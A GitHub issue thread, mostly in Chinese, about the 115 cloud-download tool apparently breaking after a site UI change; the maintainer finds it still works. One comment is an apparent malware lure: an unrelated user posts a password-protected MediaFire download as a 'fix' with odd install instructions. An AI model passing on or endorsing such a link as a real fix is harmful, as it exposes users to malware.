### ISSUE TITLE
115更新之后不能用了

### ISSUE THREAD

**Issue by leodu0926** [acgotaku/115#607]

**Comment by leodu0926** [comment]
115的ui换了之后好像不能用了 找不到入口了
![screenshot-20240831-143129](https://github.com/user-attachments/assets/aa974f79-52f8-42e8-929e-ce9839d61020)

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by leodu0926** [comment]
> hi bro, to fix your trouble try this fix, i see it in another issue, https://app.mediafire.com/dqajf1x14ccfd password: changeme when you installing it, you need to place a check in install to path and select usx

ok can you just post the issue you saw, and I can check it myself, thank you

**Comment by acgotaku** [comment]
云下载这个是收费功能，我没收费账户 所以没测试到。。。

**Comment by leodu0926** [comment]
> 云下载这个是收费功能，我没收费账户 所以没测试到。。。

😂😂😂大佬要不你把账号发我，我想办法给你搞段时间会员？

**Comment by acgotaku** [comment]
<img width="329" alt="Screen Shot 2024-09-02 at 8 37 33" src="https://github.com/user-attachments/assets/731267b3-939c-47b9-874b-42ba55191be6">

**Comment by leodu0926** [comment]
> <img alt="Screen Shot 2024-09-02 at 8 37 33" width="329" src="https://private-user-images.githubusercontent.com/1191834/363525979-731267b3-939c-47b9-874b-42ba55191be6.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjUyNjM5MDMsIm5iZiI6MTcyNTI2MzYwMywicGF0aCI6Ii8xMTkxODM0LzM2MzUyNTk3OS03MzEyNjdiMy05MzljLTQ3YjktODc0Yi00MmJhNTUxOTFiZTYucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDkwMiUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDA5MDJUMDc1MzIzWiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9ZjVkNDEzM2Q1ZTE4ZDFmMDMxNWM4OWQ2NWFlNTcxNmVmNmRiMmVkMTEzYzZlODUxYmUyNGNiYzlkZDU4ZDc1YiZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.sO-LndqHePMjbrZUofz5Hdbc8k2rN_4cL2zTiSN7UMo">

大佬弄好了，你有空的时候看一下

**Comment by acgotaku** [comment]
<img width="1626" alt="Screen Shot 2024-09-02 at 17 18 26" src="https://github.com/user-attachments/assets/ec751e61-8fc7-43f7-af8c-2a7bdaf7702d">

我测试了一下，是能下载的，是你的访问网址不对么？

https://115.com/?offset=0&mode=wangpan

**Comment by leodu0926** [comment]
> <img alt="Screen Shot 2024-09-02 at 17 18 26" width="1626" src="https://private-user-images.githubusercontent.com/1191834/363613830-ec751e61-8fc7-43f7-af8c-2a7bdaf7702d.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjU5NDkyNTEsIm5iZiI6MTcyNTk0ODk1MSwicGF0aCI6Ii8xMTkxODM0LzM2MzYxMzgzMC1lYzc1MWU2MS04ZmM3LTQzZjctYWY4Yy0yYTdiZGFmNzcwMmQucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDkxMCUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDA5MTBUMDYxNTUxWiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9Nzg3MDg3M2QyN2Q4ZGNiYmE3YmY1N2I0Mjk4MjY1ODAyYWQyNzZjZTgxY2ZiNWQzN2MwMjg3MzhiOWQyNzE0MyZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.LPy395PaHkbL68wfJROSKEs60bQXK9xgTjAWcp1wWnM">
> 我测试了一下，是能下载的，是你的访问网址不对么？
> 
> https://115.com/?offset=0&mode=wangpan

好的 大佬 我看了一下确实好了 不知到当时是哪里不太对 感谢大佬！
